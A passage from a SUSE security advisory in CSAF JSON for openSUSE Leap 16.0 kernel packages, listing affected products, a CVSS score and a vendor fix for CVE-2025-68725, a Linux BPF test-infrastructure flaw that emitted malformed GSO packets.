"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68379"
},
{
"cve": "CVE-2025-68725",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68725"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Do not let BPF test infra emit invalid GSO types to stack\n\nYinhao et al. reported that their fuzzer tool was able to trigger a\nskb_warn_bad_offload() from netif_skb_features() -\u003e gso_features_check().\nWhen a BPF program - triggered via BPF test infra - pushes the packet\nto the loopback device via bpf_clone_redirect() then mentioned offload\nwarning can be seen. GSO-related features are then rightfully disabled.\n\nWe get into this situation due to convert___skb_to_skb() setting\ngso_segs and gso_size but not gso_type. Technically, it makes sense\nthat this warning triggers since the GSO properties are malformed due\nto the gso_type. Potentially, the gso_type could be marked non-trustworthy\nthrough setting it at least to SKB_GSO_DODGY without any other specific\nassumptions, but that also feels wrong given we should not go further\ninto the GSO engine in the first place.\n\nThe checks were added in 121d57af308d (\"gso: validate gso_type in GSO\nhandlers\") because there were malicious (syzbot) senders that combine\na protocol with a non-matching gso_type. If we would want to drop such\npackets, gso_features_check() currently only returns feature flags via\nnetif_skb_features(), so one location for potentially dropping such skbs\ncould be validate_xmit_unreadable_skb(), but then otoh it would be\nan additional check in the fast-path for a very corner case. Given\nbpf_clone_redirect() is the only place where BPF test infra could emit\nsuch packets, lets reject them right there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68725",
"url": "https://www.suse.com/security/cve/CVE-2025-68725"
},
{
"category": "external",
"summary": "SUSE Bug 1255569 for CVE-2025-68725",
"url": "https://bugzilla.suse.com/1255569"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
